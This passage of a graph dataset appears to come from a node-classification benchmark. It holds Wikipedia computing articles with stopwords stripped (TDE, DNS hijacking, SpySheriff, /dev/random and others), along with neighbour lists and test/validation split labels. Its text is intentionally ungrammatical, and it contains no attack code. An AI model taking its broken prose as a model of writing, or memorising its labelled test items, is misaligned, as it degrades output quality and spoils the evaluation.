    "text": "Transparent_Data_Encryption:transparent data encryption transparent data encryption often abbreviated tde technology employed microsoft ibm oracle encrypt database files tde offers encryption file level tde solves problem protecting data rest encrypting databases hard drive consequently backup media protect data transit data use enterprises typically employ tde solve compliance issues pci dss require protection data rest microsoft offers tde part microsoft sql server 2008 2008 r2 2012 2014 2016 tde supported evaluation developer enterprise datacenter editions microsoft sql server sql tde supported hardware security modules thales e-security townsend security safenet inc. ibm offers tde part db2 version 10.5 fixpack 5 also supported cloud versions product default db2 cloud db2 warehouse cloud oracle requires oracle advanced security option oracle 10g 11g enable tde oracle tde addresses encryption requirements associated public private privacy security mandates pci california sb 1386 oracle advanced security tde column encryption introduced oracle database 10g release 2 oracle advanced security tde tablespace encryption support hardware security modules hsms introduced oracle database 11gr1 keys tde stored hsm manage keys across servers protect keys hardware introduce separation duties key used encrypt columns table regardless number columns encrypted encryption keys encrypted using database server master key stored dictionary table database sql server utilizes encryption hierarchy enables databases shared within cluster migrated instances without re-encrypting hierarchy consists combination symmetric asymmetric ciphers database backups compression occurs encryption due fact strongly encrypted data significantly compressed backups tde encrypted databases require additional resources enable automatic booting sql server stores lowest level encryption keys persistent storage using dpapi store presents potential security issue stored keys directly recovered live system backups used decrypt databases",
    "neighbors": [
      6850,
      5051,
      3366,
      3880,
      1964,
      653,
      3629,
      7794,
      2901,
      4630,
      11030,
      3323,
      4255
    ],
    "mask": "Test"
  },
  {
    "node_id": 8053,
    "label": 4,
    "text": "Milton_Smith:milton smith milton smith american computer security application developer researcher writer smith best known role leading java platform security oracle period high-profile security incidents fall 2012 due climate around java security 2013 smith invited present black hat leadership closed session non-disclosure agreement top industry leaders year smith established first ever full security track software developers conference javaone oracle premier conference java software developers san francisco california usa smith continues principal security analyst oracle working strategically across company business units smith active collaborator industry developing open source security tools researchers well participating security conference events organizing period smith chief technical editor application security book project colleges prior oracle around june 2011 smith leading security user data analytics uda business unit yahoo developed innovative security controls secure yahoo click stream revenues smith also lead yahoo enterprise security triage program monitoring enterprise vulnerabilities tracking remediation activities owasp one largest non-profit organizations security practitioners world march 12 2015 smith developed deepviolet tls/ssl scanning api researchers use extend tls/ssl scanning projects today deepviolet owasp incubator project smith also leader owasp security logging api project open source project extending important security features applications use popular logging platforms like log4j logback",
    "neighbors": [
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8054,
    "label": 4,
    "text": "DNS_hijacking:dns hijacking dns hijacking dns redirection practice subverting resolution domain name system dns queries achieved malware overrides computer tcp/ip configuration point rogue dns server control attacker modifying behaviour trusted dns server comply internet standards modifications may made malicious purposes phishing self-serving purposes internet service providers isps public/router-based online dns server providers direct users web traffic isp web servers advertisements served statistics collected purposes isp dns service providers block access selected domains form censorship one functions dns server translate domain name ip address applications need connect internet resource website functionality defined various formal internet standards define protocol considerable detail dns servers implicitly trusted internet-facing computers users correctly resolve names actual addresses registered owners internet domain rogue dns server translates domain names desirable websites search engines banks brokers etc ip addresses sites unintended content even malicious websites users depend dns servers automatically assigned isps zombie computers use dns-changing trojans invisibly switch automatic dns server assignment isp manual dns server assignment rogue dns servers router assigned dns servers also altered remote exploitation vulnerability within router firmware users try visit websites instead sent bogus website attack termed pharming site redirected malicious website masquerading legitimate website order fraudulently obtain sensitive information termed phishing number consumer isps cablevision optimum online centurylink cox communications rcn rogers charter communications spectrum plusnet verizon sprint t-mobile us virgin media frontier communications bell sympatico t-online optus mediacom ono talktalk bigpond telstra ttnet türksat telkom indonesia use dns hijacking purposes displaying advertisements collecting statistics dutch isps xs4all ziggo use dns hijacking court order ordered block access pirate bay display warning page instead practices violate rfc standard dns nxdomain responses potentially open users cross-site scripting attacks concern dns hijacking involves hijacking nxdomain response internet intranet applications rely nxdomain response describe condition dns entry specified host one query invalid domain name example www.example.invalid one get nxdomain response – informing application name invalid taking appropriate action example displaying error attempting connect server however domain name queried one non-compliant isps one would always receive fake ip address belonging isp web browser behavior annoying offensive connections ip address display isp redirect page provider sometimes advertising instead proper error message however applications rely nxdomain error instead attempt initiate connections spoofed ip address potentially exposing sensitive information examples functionality breaks isp hijacks dns cases isps provide subscriber-configurable settings disable hijacking nxdomain responses correctly implemented setting reverts dns standard behavior isps however instead use web browser cookie store preference case underlying behavior resolved dns queries continue redirected isp redirect page replaced counterfeit dns error page applications web-browsers opted scheme using cookies opt-out targets http protocol scheme actually implemented protocol-neutral dns system uk information commissioner office acknowledged practice involuntary dns hijacking contravenes pecr ec directive 95/46 data protection require explicit consent processing communication traffic however refused intervene claiming would sensible enforce law would cause significant indeed demonstrable detriment individuals germany 2019 revealed deutsche telekom ag manipulated dns servers also transmitted network traffic non-secure cookies users use https third party company web portal t-online users redirected due dns manipulation owned deutsche telekom user filed criminal complaint deutsche telekom stopped dns manipulations icann international body responsible administering top-level domain names published memorandum highlighting concerns affirming end users dissatisfied poor opt-out options like cookies responded controversy finding ways avoid spoofed nxdomain responses dns software bind dnsmasq offer options filter results run gateway router protect entire network google among others run open dns servers currently return spoofed results user could use google public dns instead isp dns servers willing accept use service google privacy policy potentially exposed another method google track user one limitation approach providers block rewrite outside dns requests opendns owned cisco similar popular service alter nxdomain responses google april 2016 launched dns-over-https service scheme overcome limitations legacy dns protocol performs remote dnssec check transfers results secure https tunnel also application-level work-arounds noredirect firefox extension mitigate behavior approach like fixes one application example firefox address issues caused website owners may able fool hijackers using certain dns settings example setting txt record unused wildcard address e.g *.example.com alternatively try setting cname wildcard example.invalid making use fact '.invalid guaranteed exist per rfc limitation approach prevents hijacking particular domains may address vpn security issues caused dns hijacking",
    "neighbors": [
      899,
      10756,
      138,
      278,
      5531,
      1692,
      7965,
      9117,
      8224,
      10915,
      2996,
      3643,
      6076,
      448,
      6209,
      10950,
      2887,
      7251,
      5078,
      2136,
      225,
      4198,
      8432,
      4725,
      5749,
      8055,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 8055,
    "label": 4,
    "text": "ISP_redirect_page:isp redirect page isp redirect page spoof page served major isps including cox communications embarq verizon rogers earthlink various others world wide web users enter invalid dns name user types incorrect uniform resource locator url example codice_1 instead codice_2 isp dns server respond spoofed dns response redirects user advertising web page domain name system dns resolution process translating human-readable domain name example codice_3 ip address computers use every isp runs dns server allow customers translate domain names ip addresses computers understand use isp dns server receives request translate name according rfc dns server return associated ip address customer computer able connect requested resource isp dns server receives request name recognized unavailable isps spoof nx null response instead return ip address search advertising page client client using web browser display search page contains possible suggestions proper address small explanation error search pages often contain advertising paid isp sometimes customer opt-out service opt-out frequently implemented layer spoofing opt-out procedures vary isp isp method implementation effectiveness",
    "neighbors": [
      2945,
      2887,
      138,
      8054,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 8056,
    "label": 5,
    "text": "Simple_Symmetric_Transport_Protocol:simple symmetric transport protocol simple symmetric transport protocol sstp protocol delivering messages clients servers used microsoft groove",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8057,
    "label": 9,
    "text": "List_of_programming_language_researchers:list programming language researchers following list researchers programming language theory design implementation related areas",
    "neighbors": [
      512,
      515,
      4483,
      3462,
      6791,
      8582,
      6420,
      1435,
      7069,
      6558,
      9245,
      11555,
      3876,
      5031,
      4392,
      4777,
      6313,
      9644,
      5165,
      5677,
      10670,
      2482,
      564,
      692,
      1976,
      4025,
      9915,
      6460,
      4799,
      10560,
      11328,
      3267,
      2372,
      8644,
      8262,
      10568,
      10569,
      8524,
      1613,
      5585,
      9425,
      1236,
      477,
      7775,
      2272,
      4578,
      8059,
      10083,
      8421,
      6502,
      11625,
      8554,
      11242,
      883,
      5496,
      3705,
      7931,
      7292,
      2045,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 8058,
    "label": 3,
    "text": "QorIQ:qoriq qoriq brand arm-based power isa-based communications microprocessors nxp semiconductors formerly freescale evolutionary step powerquicc platform initial products built around one e500mc cores came five different product platforms p1 p2 p3 p4 p5 segmented performance functionality platform keeps software compatibility older powerpc products powerquicc platform 2012 freescale announced arm based qoriq offerings beginning 2013 qoriq brand p1 p2 p4 product families announced june 2008 details p3 p5 products announced 2010 qoriq p series processors manufactured 45 nm fabrication process available end 2008 p1 p2 mid-2009 p4 2010 p5 qoriq series based 28 nm process pushing aggressive power envelope target capping 30 w. using e6500 core altivec expected shipping 2013 qoriq ls-1 ls-2 families arm based processors using cortex a7 cortex a9 a15 a53 a72 cores upon isa agnostic layerscape architecture available since 2013 target low mid range networking wireless infrastructure applications layerscape ls architecture latest evolution qoriq family features previously provided dpaa like compression may implemented software hardware depending specific chip transparent application programmers ls-1 ls-2 announced use cortex a7 a9 a15 a53 a72 cores initial ls-1 series include accelerated packet processing layer focusing typical power consumption less 3w using two cortex a7 providing ecc caches ddr3/4 1000 1600 mt/s dual pci express controllers x1/x2/x4 operation sd/mmc sata 1/2/3 usb 2/3 integrated phy virtualized etsec gigabit ethernet controllers ls1 means ls1xxx series e.g. ls1021a etc ls2 means ls2xxx series ls2 means higher performance level ls1 indicate second generation middle two digits product name core count last digit distinguishes models cases higher digit meaning greater performance “ ” end indicates arm processor lx designates 16 nm finfet generation ls1 family built layerscape architecture programmable data-plane engine networking architecture ls1 ls2 families processors offer advanced high-performance datapath network peripheral interfaces features frequently required networking telecom/datacom wireless infrastructure military aerospace applications freescale semiconductor inc. acquired nxp semiconductors late 2015 announced network processor system architecture said give flexibility scalability required network infrastructure oems handle market trends connected devices massive datasets tight security real-time service increasingly unpredictable network traffic patterns qoriq p series processors based e500 e5500 cores p10xx series p2010 p2020 based e500v2 core p204x p30xx p40xx e500mc core p50xx e5500 core features include 32/32 kb data/instruction l1 cache 36-bit physical memory addressing appended top virtual address process context process still 32bit double precision floating point unit present cores support virtualization hypervisor layer present products featuring e500mc e5500 dual multi-core devices supports symmetric asymmetric multiprocessing run multiple operating systems parallel p1 series tailored gateways ethernet switches wireless lan access points general-purpose control applications entry level platform ranging 400 800 mhz devices designed replace powerquicc ii pro powerquicc iii platforms chips include among integrated functionality gigabit ethernet controllers two usb 2.0 controllers security engine 32-bit ddr2 ddr3 memory controller ecc support dual four-channel dma controllers sd/mmc host controller high speed interfaces configured serdes lanes pcie sgmii interfaces chip packaged 689-pin packages pin compatible p2 family processors p2 series designed wide variety applications networking telecom military industrial markets available special high quality parts junction tolerances −40 125 °c especially suited demanding doors environments mid-level platform devices ranging 800 mhz 1.2 ghz designed replace powerquicc ii pro powerquicc iii platforms chips include among integrated functionality 512 kb l2 cache security engine three gigabit ethernet controllers usb 2.0 controller 64-bit ddr2 ddr3 memory controller ecc support dual four-channel dma controllers sd/mmc host controller high speed serdes lanes configured three pcie interfaces two rapidio interfaces two sgmii interfaces chips packaged 689-pin packages pin compatible p1 family processors p3 series mid performance networking platform designed switching routing p3 family offers multi-core platform support four e500mc cores frequencies 1.5 ghz chip connected corenet coherency fabric chips include among integrated functionality integrated l3 caches memory controller multiple i/o-devices duart gpio usb 2.0 security encryption engines queue manager scheduling on-chip events serdes based on-chip high speed network configurable multiple gigabit ethernet 10 gigabit ethernet rapidio pcie interfaces p3 family processors share physical package also software backwards compatible p4 p5 p3 processors 1.3 ghz 64-bit ddr3 memory controllers 18 serdes lanes networking hardware accelerators packet handling scheduling regular expressions raid security cryptography rapidio cores supported hardware hypervisor run symmetric asymmetric mode meaning cores run boot operating systems together separately resetting partitioning cores datapaths independently without disturbing operating systems applications p4 series high performance networking platform designed backbone networking enterprise level switching routing p4 family offers extreme multi-core platform support eight e500mc cores frequencies 1.5 ghz chip connected corenet coherency fabric chips include among integrated functionality integrated l3 caches memory controllers multiple i/o-devices duart gpio usb 2.0 security encryption engines queue manager scheduling on-chip events serdes based on-chip high speed network configurable multiple gigabit ethernet 10 gigabit ethernet rapidio pcie interfaces cores supported hardware hypervisor run symmetric asymmetric mode meaning cores run boot operating systems together separately resetting partitioning cores datapaths independently without disturbing operating systems applications help software developers system designers get started qoriq p4080 freescale worked virtutech create virtual platform p4080 used prior silicon availability develop test debug software chip currently simulator p4080 chips announced 2008 complete set network engines processor used telecommunication systems lte enodeb epc wcdma bts freescale 6wind ported 6wind packet processing software p4080 p5 series based high performance 64-bit e5500 core scaling 2.5 ghz allowing numerous auxiliary application processing units well multi core operation via corenet fabric p5 series processors share physical package also software backwards compatible p3 p4 p5 processors 1.3 ghz 64-bit ddr3 memory controllers 18 serdes lanes networking hardware accelerators packet handling scheduling regular expressions raid security cryptography rapidio introduced june 2010 samples available late 2010 full production expected 2011 applications range high end networking control plane infrastructure high end storage networking complex military industrial devices february 2011 freescale introduced qoriq qonverge platform series combined cpu dsp soc processors targeting wireless infrastructure applications psc913x family chips uses e500 core based cpu starcore sc3850 dsps available 2011 manufactured 45 nm process e6500 cs3900 core based 28 nm parts available 2012 called p4xxx qoriq advanced multiprocessing amp series processors based multithreaded 64-bit e6500 core integrated altivec simd processing units except lowest end t1 family uses older e5500 core products range single core versions parts 12 cores frequencies ranging way 2.5 ghz processes sectioned five classes according performance features named t1 t5 manufactured 28 nm process beginning 2012 t4 family uses e6500 64-bit dual threaded core t2 family uses e6500 64-bit dual threaded core t1 family uses e5500 64-bit single threaded core 1.2 1.5 ghz 256 kb l2 cache per core 256kb shared corenet l3 cache qoriq products bring new challenges order design control planes telecommunication systems data plane instance 4 8 cores used p4080 order achieve millions packet processing per seconds system scale regular software stack many cores require different system design order restore simplicity still get highest level performance telecommunication systems based segregation cores cores used control plane others used re-designed data plane based fast path freescale partnered networking company 6wind provide software developers high-performance commercial packet processing solution qoriq platform",
    "neighbors": [
      6663,
      5642,
      1548,
      11282,
      9235,
      2073,
      11289,
      1563,
      1057,
      38,
      4139,
      2097,
      11314,
      8761,
      6715,
      8253,
      6207,
      7745,
      7747,
      2635,
      9302,
      3168,
      99,
      1635,
      7269,
      8812,
      3185,
      4211,
      5235,
      7286,
      10361,
      638,
      7299,
      644,
      1158,
      4743,
      7302,
      7305,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      6311,
      9391,
      5297,
      3255,
      11447,
      9913,
      1725,
      8383,
      10945,
      4821,
      6878,
      8931,
      2788,
      10985,
      9964,
      2805,
      6391,
      3319,
      3835,
      2814,
      6914,
      3844,
      4868,
      3846,
      10501,
      781,
      6415,
      4881,
      1309,
      6949,
      1321,
      5417,
      2862,
      10543,
      7988,
      11062,
      6971,
      9020,
      10562,
      8003,
      6981,
      5963,
      1871,
      336,
      1872,
      8530,
      2388,
      342,
      3932,
      11613,
      6495,
      3936,
      1377,
      869,
      11629,
      8048,
      6001,
      373,
      392,
      3467,
      1933,
      3472,
      1428,
      7065,
      4508,
      3493,
      7077,
      8102,
      9638,
      4017,
      1461,
      8120,
      1983,
      1985,
      9155,
      10180,
      3017,
      9163,
      7631,
      6608,
      980,
      3540,
      9174,
      10199,
      2524,
      9182,
      10214,
      10224,
      1014,
      3575,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 8059,
    "label": 9,
    "text": "Anders_Hejlsberg:anders hejlsberg anders hejlsberg born 2 december 1960 prominent danish software engineer co-designed several popular commercially successful programming languages development tools original author turbo pascal chief architect delphi currently works microsoft lead architect c core developer typescript hejlsberg born copenhagen denmark studied electrical engineering technical university denmark university 1980 began writing programs nascom microcomputer including pascal compiler initially marketed blue label software pascal nascom-2 however soon rewrote cp/m dos marketing first compas pascal later polypascal later product licensed borland integrated ide become turbo pascal system turbo pascal competed polypascal compiler largely inspired tiny pascal compiler niklaus wirth algorithms data structures programs one influential computer science books time borland hands turbo pascal became one commercially successful pascal compilers hejlsberg remained polydata company came financial stress 1989 moved california become chief engineer borland time developed turbo pascal became chief architect team produced delphi replaced turbo pascal 1996 hejlsberg left borland joined microsoft one first achievements j++ programming language windows foundation classes also became microsoft distinguished engineer technical fellow since 2000 lead architect team developing c language 2012 hejlsberg announced new microsoft project typescript superset javascript hejlsberg received 2001 dr. dobb excellence programming award work turbo pascal delphi c microsoft .net framework together shon katzenberger scott wiltamuth todd proebsting erik meijer peter hallam peter sollich anders awarded technical recognition award outstanding technical achievement work c language 2007 video available microsoft channel 9",
    "neighbors": [
      8057,
      3462,
      8262,
      6795,
      8524,
      10991,
      883,
      3573,
      4409,
      7450,
      9467,
      10684,
      7775
    ],
    "mask": "Test"
  },
  {
    "node_id": 8060,
    "label": 3,
    "text": "Thread_control_block:thread control block thread control block tcb data structure operating system kernel contains thread-specific information needed manage tcb manifestation thread operating system example information contained within tcb thread control block acts library information threads system specific information stored thread control block highlighting important information process",
    "neighbors": [
      9739,
      9911
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8061,
    "label": 4,
    "text": "Proofpoint,_Inc.:proofpoint inc. proofpoint enterprise security company based sunnyvale california provides software service products inbound email security outbound data loss prevention social media mobile devices digital risk email encryption electronic discovery ediscovery ” email archiving claims half fortune 100 users solutions company founded june 2002 eric hahn formerly cto netscape communications launched july 21 2003 raising 7 million series funding round releasing first product lining six customers references backed venture investors benchmark capital stanford university additional 9 million series b funding led new york-based rre ventures announced october 2003 proofpoint became publicly traded company april 2012 time initial public offering ipo company shares traded 13 apiece investors purchased 6.3 million shares ipo raising 80 million company first product proofpoint protection server medium large businesses incorporated described mlx technology proprietary machine learning algorithms applied problem accurately identifying spam email using 10,000 different attributes differentiate spam valid email company joined dozens anti-spam software providers business opportunity fueled exponential increase spam volume threatening worker productivity making spam top business priority according 2004 national technology readinesed number spam detection attributes 50,000 2004 strict new hipaa regulations governing financial disclosures privacy health care data prompted proofpoint begin developing new products would automatically identify intercept outbound email containing sensitive information march 2004 proofpoint introduced first hardware appliance p-series message protection appliance later renamed proofpoint messaging security gateway using hardened linux kernel proofpoint protection server 2.0 software tested infoworld found stop 94 spam another product introduction november 2004 included protection server 3.0 email firewall mlx-based dynamic reputation analysis content security suite plug-in modules designed scanning outbound messages attachments assist compliance data protection regulations sarbanes-oxley hipaa gramm-leach-bliley combination known proofpoint messaging security gateway appliance reviewed channelweb proofpoint appliance stands guard e-mail gate channelweb nov 26 2004 observed used combination technologies policy-based management spam-filtering engine adaptive learning technology proofpoint introduced new product network content sentry add-on appliance content security suite august 2005 designed monitor online messaging email appliance monitors web mail message boards blogs ftp-based communications proofpoint also introduced policy-based email encryption features using identity-based encryption technology licensed voltage security step towards simpler operational requirements proofpoint messaging security gateway virtual edition released april 2007 product runs virtual appliance host running vmware virtual server software moving dedicated hardware appliance virtual server eliminates problems associated proprietary hardware reduces upgrade costs though require knowledge vmware virtual server architecture proofpoint messaging security gateway v5.0 released june 2007 based new integrated architecture combining capabilities single platform could run either dedicated appliance virtual appliance software suite icsa labs independent division verizon business announced april 2007 certified six anti-spam products new testing program one proofpoint messaging security gateway goal icsa labs anti-spam product testing certification evaluate product effectiveness detecting removing spam guidelines also address well products recognize e-mail messages legitimate sources moving software-as-a-service business proofpoint introduced proofpoint demand hosted version email security data loss prevention offerings may 2008 company hosted offerings expanded introduction proofpoint demand—standard edition product targeted small-to-medium size businesses need email security run servers on-site personnel proofpoint products designed solve three business problems advanced cybersecurity threats regulatory compliance brand-impostor fraud calls “ digital risk ” products work across email social media mobile devices cloud june 2008 proofpoint acquired fortiva inc. provider on-demand email archiving software legal discovery regulatory compliance email storage management fortiva used exchange journaling automatically archive internal external communications end users search archived messages including attachments directly search folder outlook proofpoint security portfolio includes products stop traditional cyberattacks delivered via malicious attachments urls socially engineered attacks—such business email compromise bec credential phishing—that use malware uses blend sandbox analysis reputational analysis automated threat data human threat intelligence attributes sender/recipient relationship headers content detect potential threats automated encryption data-loss prevention forensics-gathering tools designed speed incident response mitigate damage costs threats get portfolio also includes protection social-media account takeovers harmful mobile apps rogue wi-fi networks proofpoint compliance products designed reduce manual labor involved identifying potentially sensitive data managing supervising compliance government industry rules producing quickly e-discovery legal requests proofpoint digital risk products aimed companies seeking stop cybercriminals impersonating brand harm customers partners brand reputation email digital risk portfolio includes authentication technology prevent email domain spoofing social media stops scams fraudsters create fake customer-service accounts find people seeking help social media trick handing account credentials visiting malicious website mobile finds counterfeit apps distributed mobile app stores 2016 forrester wave™ digital risk monitoring q3 2016 proofpoint digital risk social media product included evaluation nine top vendors emerging market solutions monitor “ digital ” —i.e. social mobile web dark web—channels detect prevent malicious unwanted content undermining organizational efforts build brand across major social media platforms oct 23 2014 proofpoint acquired nexgate inc. social media security compliance vendor nov 4 2015 proofpoint acquired socialware inc compliance workflow content capture review technology company 2010 2011 2012 2013 2014 2015 2016 gartner magic quadrant identified proofpoint inc. leader “ magic quadrant secure email gateways ” seventh consecutive year gartner magic quadrant identified proofpoint inc. leader enterprise information archiving 2017 2017 sc magazine awards proofpoint inc. awarded best email security solution best regulatory compliance solution 2016 sc magazine award proofpoint inc. awarded best email security trust award forrester research named proofpoint inc. “ leader ” forrester wave™ digital risk monitoring q3 2016 nine vendors matter stack forrester credited proofpoint inc. report proofpoint stands rest pack strong portfolio patents related digital risk monitoring proofpoint essentials wins customers ’ choice award review platform expert insights may 2019",
    "neighbors": [
      4194,
      10245,
      11046,
      6153,
      1484,
      3629,
      9053,
      467,
      11225,
      7418,
      7515,
      8061,
      9278
    ],
    "mask": "None"
  },
  {
    "node_id": 8062,
    "label": 3,
    "text": "Phantasie:phantasie phantasie fantasy role-playing video game series designed winston douglas wood published strategic simulations 1985 released apple ii atari 8-bit family atari st amiga commodore 64 ms-dos msx based isle gelnor phantasie allows group six characters adventure countryside try defeat evil black knights sorcerer leader nikademus players could choose one six character classes thief fighter ranger monk priest wizard could also choose races human dwarf halfling elf gnome selecting random one could also choose ogre troll pixie gnoll orc lizard man minotaur races 1986 ssi published next part series phantasie ii dark lord nikademus nemesis time nikademus fashioned evil orb cast curse beautiful island named ferronrah enslaved people player mission find destroy orb final installment trilogy based around fighting evil nikademus finishing good released 1987 time nikademus attempting take entire world party stop entry japan-exclusive pc-9801 msx english translation 50,000 copies sold north america phantasie successful ssi company best-selling commodore game late 1987 phantasie ii sold 30,100 copies phantasie iii sold 46,113 copies phantasie phantasie iii questron ii later re-released together reviewed 1994 dragon 203 sandy petersen eye monitor column petersen gave compilation 2 5 stars",
    "neighbors": [
      9006,
      9166,
      6030,
      10930,
      6426
    ],
    "mask": "Test"
  },
  {
    "node_id": 8063,
    "label": 2,
    "text": "BESYS:besys besys bell operating system early computing environment originally implemented batch processing operating system 1957 bell labs ibm 704 computer system developed bell recognized definite mismatch…between 704 internal speed sluggishness on-line unit-record equipment inherent slowness manual operations associated stand-alone use goals system initial version system besys-1 use october 16 1957 created george h. mealy gwen hansen wanda lee mammel guidance victor a. vyssotsky utilized ibm fortran north american symbolic assembly program sap programming languages designed efficiently deal large number jobs originating punched cards producing results suitable printing paper punched cards system also provided processing capabilities data stored magnetic tapes magnetic disk storage units typically punched card print processing handled line peripheral electronic accounting machines ibm 1401 computers eventually direct coupled computers first system actually used bell labs besys-2 system resident magnetic tape occupied lowest 64 36-bit words highest4 k words memory upper 4 k words held resident portion monitor could partially swapped magnetic drum free additional core user program needed besys complex software package provided convenient input/output integrated disk file storage facilities besys used extensively many departments bell labs decade made available share organization others without charge formal technical support versions besys environment besys-3 1960 besys-4 1962 besys-5 1963 besys-7 1964 be90 1968 implemented underlying computers transitioned ibm 709x family besys development discontinued bell labs moved ibm system/360 1969 throughout period head besys development project george l. baldwin",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      10803,
      7733,
      9784,
      10809,
      573,
      576,
      8262,
      10333,
      97,
      9829,
      6248,
      8298,
      7285,
      9335,
      2168,
      1147,
      2172,
      3197,
      1150,
      2179,
      10883,
      6797,
      9361,
      9366,
      6296,
      9370,
      7325,
      9887,
      7848,
      8879,
      3248,
      6837,
      1219,
      8388,
      6342,
      9932,
      5840,
      1235,
      7382,
      8410,
      1253,
      5363,
      2811,
      3323,
      2813,
      9468,
      10499,
      1804,
      10508,
      273,
      11539,
      789,
      5397,
      3359,
      10016,
      2345,
      1323,
      7983,
      7477,
      823,
      10040,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      7507,
      10590,
      863,
      868,
      3429,
      8551,
      5492,
      4996,
      394,
      3978,
      7053,
      8077,
      7057,
      11667,
      11673,
      8092,
      6557,
      421,
      11184,
      5562,
      6075,
      6078,
      9151,
      8136,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 8064,
    "label": 4,
    "text": "SpySheriff:spysheriff spysheriff clones bravesentry pest trap spytrooper spywareno malwarealarm malware disguises anti-spyware software attempts mislead user false security alerts scaring buying program like rogue antiviruses producing list false threats prompts user pay remove software particularly difficult remove since nests components system restore folders also blocks system management tools however spysheriff removed experienced user antivirus software using rescue disk spysheriff hosted www.spysheriff.com www.spy-sheriff.com operated 2005 shutdown 2008 several similarly-named websites also hosted program shut several typosquatted websites also attempted automatically install spysheriff including fake version google.com called goggle.com 2015 goggle.com changed ownership following lawsuit google hosted survey scam displayed links amazon items 2017 domain hosted blank page word goggle present html script beginning 2018 site redirected scam site tango-deg.com october 2018 existed simple html markup top-level heading reading goggle.com inc",
    "neighbors": [
      10756,
      4165,
      9287,
      9746,
      10103,
      3320,
      8921,
      7515,
      10392
    ],
    "mask": "None"
  },
  {
    "node_id": 8065,
    "label": 6,
    "text": "/dev/random:/dev/random unix-like operating systems special files serve pseudorandom number generators allow access environmental noise collected device drivers sources typically blocks less entropy available requested typically never blocks even pseudorandom number generator seed fully initialized entropy since boot blocks boot seed securely initialized enough entropy never blocks operating systems implement methods provide random number generation kernel space implemented first time linux 1994 theodore ts implementation uses secure hashes rather ciphers avoid cryptography export restrictions place generator originally designed implementation also designed assumption given hash cipher might eventually found weak design durable face weaknesses fast recovery pool compromise considered requirement requirements pool compromise sufficient much easier direct attacks unrelated parts operating system ts implementation generator keeps estimate number bits noise entropy pool entropy pool random numbers created read codice_1 device return random bytes within estimated number bits noise entropy pool entropy pool empty reads codice_1 block additional environmental noise gathered intent serve cryptographically secure pseudorandom number generator delivering output entropy large possible suggested authors use generating cryptographic keys high-value long-term protection counterpart codice_1 codice_4 unlimited /non-blocking random source reuses internal pool produce pseudo-random bits means call block output may contain less entropy corresponding read codice_1 codice_4 still intended pseudorandom number generator suitable cryptographic purposes authors corresponding man page note theoretically may exist as-yet-unpublished attack algorithm used codice_4 users concerned attack use codice_1 instead however attack unlikely come existence entropy pool unpredictable n't leak security reduced number bits also possible write codice_1 allows user mix random data pool non-random data harmless privileged user issue ioctl needed increase entropy estimate current amount entropy size linux kernel entropy pool measured bits available codice_10 displayed command codice_11 codice_12 respectively gutterman pinkas reinman march 2006 published detailed cryptographic analysis linux random number generator describe several weaknesses perhaps severe issue report embedded live cd systems routers diskless clients bootup state predictable available supply entropy environment may limited system non-volatile memory recommend saving state rng shutdown included rng state next reboot case router network traffic represents primary available source entropy note saving state across reboots would require potential attackers either eavesdrop network traffic router first put service obtain direct access router internal state issue note particularly critical case wireless router whose network traffic captured distance may using rng generate keys data encryption linux kernel provides support several hardware random number generators installed raw output device may obtained codice_13 linux kernel 3.16 newer kernel mixes data hardware random number generators codice_1 sliding scale based definable entropy estimation quality hwrng means userspace daemon codice_15 codice_16 needed job linux kernel 3.17+ virtio rng modified default quality defined 0 currently hwrng mixed codice_1 default entropy pool improved programs like codice_18 codice_19 codice_20 etc codice_16 hardware random number generators like entropy key etc write codice_1 diehard tests programs codice_23 codice_24 codice_25 test random number generators january 2014 daniel j. bernstein published critique linux mixes different sources entropy outlines attack one source entropy capable monitoring sources entropy could modify output nullify randomness sources entropy consider function h x z h hash function x z sources entropy z output cpu based malicious hrng z bernstein estimated attacker would need repeat h x r 16 times compromise dsa ecdsa possible linux reseeds h ongoing basis instead using single high quality seed october 2016 release linux kernel version 4.8 newer codice_4 switched chacha20-based implementation theodore ts based bernstein well-regarded stream cipher chacha20 given standard shell script code uses /dev/urandom generates cryptmail heavily freebsd operating system provides codice_4 compatibility behavior different linux freebsd codice_4 link codice_1 blocks properly seeded freebsd prng fortuna reseeds regularly attempt estimate entropy system small amount network disk activity reseeding done fraction second entropy pool–based methods completely secure implemented correctly overestimate entropy may become less secure well-seeded prngs cases attacker may considerable amount control entropy example diskless server may get almost network rendering potentially vulnerable man-in-the-middle attacks since openbsd 5.1 may 1 2012 use algorithm based rc4 renamed intellectual property reasons arc4 random number generation uses system entropy gathered several ways arc4 algorithm provides fail-safe ensuring rapid high quality pseudo-random number stream provided even pool low entropy state system automatically uses hardware random number generators provided intel pci hubs available openbsd cryptographic framework openbsd 5.5 may 1 2014 call used openbsd random devices longer uses arc4 chacha20 arc4random name might reconsidered replacement call random netbsd implementation legacy api also switched chacha20 well macos uses 160-bit yarrow based sha1 difference /dev/random /dev/urandom behave identically apple ios also uses yarrow codice_1 codice_4 also available solaris netbsd tru64 unix 5.1b aix 5.2 hp-ux 11i v2 freebsd aix implements yarrow-based design however aix uses considerably fewer entropy sources standard codice_1 implementation stops refilling pool thinks contains enough entropy windows nt similar functionality delivered codice_33 reading special file codice_34 work unix documented methods generate cryptographically random bytes cryptgenrandom rtlgenrandom dos naturally provide functionality open-source third-party driver called codice_35 functions similarly creates two devices codice_36 codice_37 also accessible codice_38 codice_39 programs access random data linux emulator cygwin windows provide implementations codice_1 codice_4 used scripts programs",
    "neighbors": [
      8976,
      10387,
      5397,
      6808,
      10926,
      7983,
      823,
      4925,
      701,
      593,
      7252,
      8414,
      7139,
      8679,
      5363,
      10620,
      5117,
      1150,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8066,
    "label": 2,
